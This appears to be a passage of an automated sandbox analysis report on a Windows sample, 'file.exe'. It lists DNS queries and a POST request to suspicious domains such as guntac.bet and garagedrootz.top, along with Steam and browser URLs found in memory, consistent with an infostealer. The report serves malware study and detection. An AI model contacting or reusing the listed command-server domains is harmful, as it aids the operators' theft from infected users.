            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: begindecafer.world
            Source: global trafficDNS traffic detected: DNS query: garagedrootz.top
            Source: global trafficDNS traffic detected: DNS query: modelshiverd.icu
            Source: global trafficDNS traffic detected: DNS query: arisechairedd.shop
            Source: global trafficDNS traffic detected: DNS query: catterjur.run
            Source: global trafficDNS traffic detected: DNS query: orangemyther.live
            Source: global trafficDNS traffic detected: DNS query: fostinjec.today
            Source: global trafficDNS traffic detected: DNS query: sterpickced.digital
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: guntac.bet
            Source: unknownHTTP traffic detected: POST /bSHsyZD HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: guntac.bet
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/coo
            Source: file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136576601.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136576601.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: file.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arisechairedd.shop:443/JnsHY
            Source: file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: file.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world:443/QwdZdf
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steams:
            Source: file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamsta
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
            Source: file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/1
            Source: file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/ap
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/F
            Source: file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, 